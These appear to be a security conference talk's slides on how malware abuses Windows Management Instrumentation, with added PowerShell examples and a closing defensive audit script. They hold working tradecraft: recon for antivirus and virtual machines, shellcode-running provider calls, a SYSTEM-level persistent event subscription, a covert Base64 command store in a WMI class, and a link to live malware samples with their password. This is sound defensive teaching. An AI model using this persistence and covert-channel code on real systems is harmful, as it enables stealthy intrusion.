WMI - A FRONT DOOR FOR MALWARES

Post on 14-Apr-2017


Windows Management Instrumentation – A Front Door for Malware

Santhosh Kumar

Whoami

• Love to break things apart.
• Hobby hacker.
• Spoke at various conferences including DEFCON Las Vegas, OWASP AppSec USA 2014, BSides Las Vegas.
• Second time here.

Outline

• WM… what?
• WMI malware timeline
• WMI architecture
• WQL
• WMI providers
• WMI eventing
• Demo
• Defenses

WM…what?

• System management, both local and remote.
• Shipped as an add-on for NT4 and Windows 95/98; built into every Windows since 2000.
• Used to access the registry, file system, network configuration, processes, etc.
• Eventing, remoting and remote code execution.
• Endless possibilities.
• Supported by many tools.
• Has its own query language (WQL).

Why should I care?

WMI malware Timeline

• MS10-061 – Windows Print Spooler (2010).
• Attackers dropped a MOF file into the wbem\mof directory, which WMI auto-compiles, to gain RCE.
• Microsoft patched it in update KB2347290.
• http://poppopret.blogspot.in/2011/09/playing-with-mof-files-on-windows-for.html

Hammertoss APT (2015)

• Heavy reliance upon WMI and PowerShell.
• Custom WMI class creation.
• WMI repository used to store payloads of arbitrary size.
• Results of commands added to WMI object properties.
• https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

Syndicasec (2013-2015)

• Two-stage infection.
• Creates a __TimerInstruction to raise a custom timer event.
• An event filter is created to link the timer event to the malicious consumer (the "EvilProviders").
• Every time the timer fires, the consumer executes, giving persistent RCE.
• http://www.welivesecurity.com/2013/05/23/syndicasec-in-the-sin-bin/

WMI architecture

• https://msdn.microsoft.com/en-us/library/aa394553(v=vs.85).aspx

Interaction with WMI

• winrm
• .NET
• VBScript
• JScript
• C/C++ via the IWbem COM API
• More utilities: http://passing-the-hash.blogspot.in/2013/04/missing-pth-tools-writeup-wmic-wmis-curl.html

WQL

• Similar to SQL; queries WMI objects, classes and namespaces.
• Three types of query:
  • Data query
  • Event query
  • Schema query
• Useful for recon.
• https://msdn.microsoft.com/en-us/library/aa392902(v=vs.85).aspx

WMI Recon

• Find installed antivirus.
• Find the security updates installed on the system.
• Find out if it is a VM.
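The three recon slides above were shown as screenshots. The following is an added example, not code from the original talk, that performs the same three lookups with the CIM cmdlets; the VM fingerprint strings and the productState bit decoding are common conventions, not documented API, and are labelled as such in the comments.

```powershell
# Added example (not from the original slides). Run locally, or add
# -ComputerName <host> to each Get-CimInstance to query a remote box over WMI.

# 1. Installed antivirus products. root/SecurityCenter2 exists on client SKUs
#    only (Vista and later); on Windows Server the query returns nothing.
$av = Get-CimInstance -Namespace 'root/SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction SilentlyContinue
foreach ($p in $av) {
    # productState is an undocumented bit field. The commonly used decoding:
    # bit 0x1000 set  -> real-time protection enabled
    # bit 0x10   set  -> signatures out of date
    $state = [int]$p.productState
    [pscustomobject]@{
        Product  = $p.displayName
        Enabled  = (($state -band 0x1000) -ne 0)
        UpToDate = (($state -band 0x10) -eq 0)
    }
}

# 2. Installed security updates. Win32_QuickFixEngineering lists updates applied
#    through the servicing stack (KB numbers); MSI-delivered updates are not here.
Get-CimInstance -ClassName Win32_QuickFixEngineering |
    Sort-Object InstalledOn -Descending |
    Select-Object HotFixID, Description, InstalledOn

# 3. Is this a VM? Hypervisors leave tell-tale manufacturer/model strings in the
#    SMBIOS data that Win32_ComputerSystem and Win32_BIOS expose.
$cs   = Get-CimInstance -ClassName Win32_ComputerSystem
$bios = Get-CimInstance -ClassName Win32_BIOS
$fingerprint = "$($cs.Manufacturer) $($cs.Model) $($bios.SerialNumber)"
$vmHints = 'VMware', 'VirtualBox', 'innotek', 'Virtual Machine', 'KVM', 'QEMU', 'Xen', 'HVM domU', 'Parallels'
$isVm = @($vmHints | Where-Object { $fingerprint -match [regex]::Escape($_) }).Count -gt 0
[pscustomobject]@{
    Manufacturer = $cs.Manufacturer
    Model        = $cs.Model
    LikelyVM     = $isVm
}
```

All three are plain data queries (the first of the three WQL query types above); none of them needs admin rights, which is why WMI recon is a quiet first step on a freshly compromised host.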

WMI providers

• Form the core of how WMI works: each provider implements the classes and methods callers see.
• Each provider ships as a DLL plus a MOF file describing its classes.
• Each provider is registered with its own CLSID (GUID).
• Located under %windir%\System32\Wbem.
• Custom (third-party or attacker-supplied) WMI providers can also be registered.

Malicious WMI providers

• EvilWMIProvider by Casey Smith (@subTee) – https://github.com/subTee/EvilWMIProvider
  Invoke-WmiMethod -Class Win32_Evil -Name ExecShellcode -ArgumentList @(0x90, 0x90, 0x90), $null

• EvilNetConnectionWMIProvider by Jared Atkinson (@jaredcatkinson) – https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider
  Invoke-WmiMethod -Class Win32_NetworkConnection -Name RunPs -ArgumentList 'whoami', $null
  Get-WmiObject -Class Win32_NetworkConnection

WMI eventing

• WMI can be used to monitor almost any type of operating-system event.
• Events are classified as two types: intrinsic and extrinsic.
• A permanent event subscription needs three parts: a filter, a consumer and a binding between them.
• http://blogs.technet.com/b/heyscriptingguy/archive/2012/06/08/an-insider-s-guide-to-using-wmi-events-and-powershell.aspx

Intrinsic Events

• Intrinsic events are system classes (__InstanceCreationEvent, __InstanceModificationEvent, __InstanceDeletionEvent, ...) included in every namespace.
• They report changes to objects in the namespace: creation, modification or deletion of instances, classes or namespaces.
• WMI detects them by polling, so the query must specify a polling interval with WITHIN; changes that happen and revert inside one interval are missed.

• https://technet.microsoft.com/en-us/library/ee156572.aspx

Extrinsic Events

• Used to monitor events that are not modelled as changes to objects in the CIM repository; they are raised directly by a provider, so no polling is needed. Examples:

ROOT\CIMV2:Win32_ComputerShutdownEvent
ROOT\CIMV2:Win32_IP4RouteTableEvent
ROOT\CIMV2:Win32_ProcessStartTrace
ROOT\CIMV2:Win32_ModuleLoadTrace
ROOT\CIMV2:Win32_ThreadStartTrace
ROOT\CIMV2:Win32_VolumeChangeEvent
ROOT\CIMV2:Msft_WmiProvider*
ROOT\DEFAULT:RegistryKeyChangeEvent
ROOT\DEFAULT:RegistryValueChangeEvent

Event Filter

• Defines which event triggers the subscription, as a WMI (WQL) event query.
• Intrinsic query (fires when a .doc or .docx file is created or modified, polled every 30 seconds):

SELECT * FROM __InstanceOperationEvent WITHIN 30
WHERE ((__CLASS = "__InstanceCreationEvent" OR __CLASS = "__InstanceModificationEvent") AND TargetInstance ISA "CIM_DataFile")
AND (TargetInstance.Extension = "doc" OR TargetInstance.Extension = "docx")

• Note the parentheses around the two Extension tests: written as `... AND (Extension = "doc") OR (Extension = "docx")`, the trailing OR binds last and the filter fires for any object whose Extension is "docx", regardless of class.

• Extrinsic query (fires when a volume is inserted; EventType 2 is device arrival):

SELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2

Event Consumer

• Defines what to do when the event fires.
• These are the five standard event consumers:

LogFileEventConsumer
ActiveScriptEventConsumer
NTEventLogEventConsumer
SMTPEventConsumer
CommandLineEventConsumer
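The filter, consumer and binding described over the last few slides, assembled into one complete permanent subscription. This is an added example, not code from the original talk: it uses the extrinsic volume-change query from the Event Filter slide, and the filter name, consumer name and the command it launches are arbitrary choices for the demo.

```powershell
# Added example (not from the original slides). Permanent subscriptions live in
# root\subscription and require an elevated prompt to create or remove.
$ns = 'root\subscription'

# 1. Filter: which event fires. EventType = 2 is "device arrival", so this
#    triggers whenever a volume (USB stick, mounted ISO, new drive) appears.
$filter = Set-WmiInstance -Namespace $ns -Class __EventFilter -Arguments @{
    Name           = 'DemoVolumeFilter'          # arbitrary name
    EventNamespace = 'root\cimv2'                # namespace the query runs in
    QueryLanguage  = 'WQL'
    Query          = 'SELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2'
}

# 2. Consumer: what runs. CommandLineEventConsumer is executed by the WMI
#    standard consumer host (scrcons.exe) as SYSTEM, which is what makes it
#    attractive to malware. %DriveName% is substituted from the event's property.
$consumer = Set-WmiInstance -Namespace $ns -Class CommandLineEventConsumer -Arguments @{
    Name                = 'DemoVolumeConsumer'   # arbitrary name
    CommandLineTemplate = 'cmd.exe /c echo volume %DriveName% arrived >> C:\Windows\Temp\volume-events.log'
}

# 3. Binding: ties filter to consumer. Nothing fires until this exists, and the
#    subscription survives reboots because it is stored in the WMI repository.
$binding = Set-WmiInstance -Namespace $ns -Class __FilterToConsumerBinding -Arguments @{
    Filter   = $filter
    Consumer = $consumer
}

# Clean-up, in reverse order: binding first, then consumer and filter.
Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
    Where-Object { $_.Filter -like '*DemoVolumeFilter*' } | Remove-WmiObject
Get-WmiObject -Namespace $ns -Class CommandLineEventConsumer -Filter "Name='DemoVolumeConsumer'" | Remove-WmiObject
Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='DemoVolumeFilter'" | Remove-WmiObject
```

Swap the Query for the intrinsic CIM_DataFile query from the previous slide and the same three objects give you a file-drop trigger; only the filter changes, the consumer and binding stay the same. That decoupling is also why the hunting approach in the Defenses section has to join bindings back to their filters and consumers instead of looking at any one class alone.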

WMIGHOST APT (2014-2015)

• Targeted Indian users, mainly in the military, energy and government-policy sectors.
• Infection via spear-phishing.
• Drops a decoy document posing as an unclassified government file, such as "India US strategic dialouge press release.doc" (MD5 000150415302D7898F56D89C610DE4A9).
• If successful, drops dw20.exe and gupdate.exe.
• Sample: https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/WMIGhost (password: infected)

ShadowNet APT

• Detected this year, around Tibetan Uprising Day.
• The group modified its toolchain to add a WMI script for information gathering and exfiltration.
• Multi-layer C&C infrastructure; victims are identified using encoded strings.
• WHOIS record of a C&C domain (note the mismatch between the New York address and the guangdong/CN fields):

Registrant Name: Kasong Dolma
Registrant Street: New York
Registrant City: New York
Registrant State/Province: guangdong
Registrant Postal Code: 10001
Registrant Country: CN
Registrant Phone: +1.9175608889
Registrant Email: mike.fly@email.com

WMI OFFENSIVE TOOLS

DEMO

• Acts like a shell, using WMI as the C&C channel.
• Uses WMI namespaces for storing the data.
• Stores the data in the namespace Base64-encoded to avoid firewall and endpoint inspection.
• Decodes the Base64 data on the attacker's machine.
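The storage half of the demo tool, written out as an added example. This is not the speaker's code and not HAMMERTOSS's: it shows the pattern both rely on, a custom class in a WMI namespace whose instances hold Base64 blobs that the other side reads back. The class name, property names and the root\default namespace are arbitrary choices.

```powershell
# Added example (not from the original slides or the speaker's demo tool).
$namespace = 'root\default'
$className = 'Win32_DemoStore'   # hypothetical name, chosen to blend in with Win32_* classes

# Create the class once (needs admin). It is declared Static with a key
# property so many named blobs can be stored as separate instances.
$class = New-Object System.Management.ManagementClass($namespace, [string]::Empty, $null)
$class['__CLASS'] = $className
$class.Qualifiers.Add('Static', $true)
$class.Properties.Add('Name', [System.Management.CimType]::String, $false)
$class.Properties['Name'].Qualifiers.Add('Key', $true)
$class.Properties.Add('Data', [System.Management.CimType]::String, $false)
$null = $class.Put()

# Operator side: write a task (or a payload of any size) Base64-encoded into an
# instance. $Name goes straight into a WQL filter on read, so keep it to [A-Za-z0-9_].
function Write-WmiBlob([string]$Name, [byte[]]$Bytes) {
    $null = Set-WmiInstance -Namespace $namespace -Class $className -Arguments @{
        Name = $Name
        Data = [Convert]::ToBase64String($Bytes)
    }
}

# Implant side: read the instance back and decode it. Add -ComputerName to
# Get-WmiObject and the same call works across the network over WMI/DCOM,
# with no HTTP beacon for a perimeter firewall to inspect.
function Read-WmiBlob([string]$Name) {
    $inst = Get-WmiObject -Namespace $namespace -Class $className -Filter "Name='$Name'"
    if ($inst) { [Convert]::FromBase64String($inst.Data) }
}

Write-WmiBlob -Name 'task1' -Bytes ([Text.Encoding]::UTF8.GetBytes('whoami /all'))
[Text.Encoding]::UTF8.GetString((Read-WmiBlob -Name 'task1'))   # prints: whoami /all

# Defender's view: the class persists in the repository (OBJECTS.DATA) across
# reboots and is invisible to tools that only inspect disk and registry.
# Get-WmiObject -Namespace root\default -List | Where-Object { $_.Name -like 'Win32_Demo*' }
```

Results flow the other way with the same two functions: the implant writes command output into an instance and the operator reads it, which is exactly the "results of commands added to WMI object properties" behaviour the HAMMERTOSS slide describes.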

Defenses

• Don't enable WMI remoting where it is not needed.
• Stricter firewall rules for the RPC/DCOM and WinRM ports WMI rides on.
• Audit permanent WMI event subscriptions (root\subscription) and baseline the legitimate ones.
• Custom event logs, e.g. the Microsoft-Windows-WMI-Activity/Operational log, or a permanent subscription of your own that logs suspicious activity.
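The "audit permanent WMI event subscriptions" bullet, as an added example (not from the original talk): it enumerates every binding on a host and joins it back to its filter and consumer so the defender sees the WQL query next to the command it launches. Nothing here is assumed beyond the standard classes in root\subscription.

```powershell
# Added example (not from the original slides). Run elevated; add -ComputerName
# to the three Get-WmiObject calls to sweep remote hosts.
$ns = 'root\subscription'

$filters   = Get-WmiObject -Namespace $ns -Class __EventFilter
$consumers = Get-WmiObject -Namespace $ns -Class __EventConsumer   # abstract parent: returns every consumer type
$bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding

foreach ($b in $bindings) {
    # Binding.Filter / Binding.Consumer are reference strings such as
    # __EventFilter.Name="X", which is exactly the object's __RELPATH.
    $f = $filters   | Where-Object { $_.__RELPATH -eq $b.Filter }
    $c = $consumers | Where-Object { $_.__RELPATH -eq $b.Consumer }

    # Extract whatever the consumer would actually do, per consumer type.
    $action = switch ($c.__CLASS) {
        'CommandLineEventConsumer'  { $c.CommandLineTemplate }
        'ActiveScriptEventConsumer' { if ($c.ScriptText) { $c.ScriptText } else { $c.ScriptFileName } }
        'LogFileEventConsumer'      { "Log to $($c.Filename)" }
        'NTEventLogEventConsumer'   { "Event log source $($c.SourceName)" }
        'SMTPEventConsumer'         { "Mail $($c.ToLine) via $($c.SMTPServer)" }
        default                     { '(consumer missing or unknown type)' }
    }

    [pscustomobject]@{
        Filter       = $f.Name
        Namespace    = $f.EventNamespace
        Query        = $f.Query
        ConsumerType = $c.__CLASS
        Consumer     = $c.Name
        Action       = $action
    }
}
```

A default Windows install has a small number of legitimate entries (for example the "SCM Event Log Filter" bound to an NTEventLogEventConsumer); anything else, and in particular any CommandLineEventConsumer or ActiveScriptEventConsumer, is worth explaining. For continuous coverage rather than point-in-time sweeps, Sysmon event IDs 19, 20 and 21 record filter, consumer and binding creation respectively, and recent Windows versions log new permanent consumers as event 5861 in the WMI-Activity/Operational log mentioned above.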

Books

References

• http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp__understanding-wmi-malware.pdf
• http://www.welivesecurity.com/2013/05/23/syndicasec-in-the-sin-bin/
• https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/WMIGhost
• https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
• http://2014.hackitoergosum.org/slides/day1_WMI_Shell_Andrei_Dumitrescu.pdf
• https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
• https://msdn.microsoft.com/en-us/library/bg126473(v=vs.85).aspx
• https://msdn.microsoft.com/en-us/library/aa394554(v=vs.85).aspx
• http://blogs.technet.com/b/heyscriptingguy/archive/2012/06/08/an-insider-s-guide-to-using-wmi-events-and-powershell.aspx
• http://www.codeproject.com/Articles/28226/Creating-WMI-Permanent-Event-Subscriptions-Using-M
• http://ytisf.github.io/theZoo/
• https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_There's_Something_About_WMI.pdf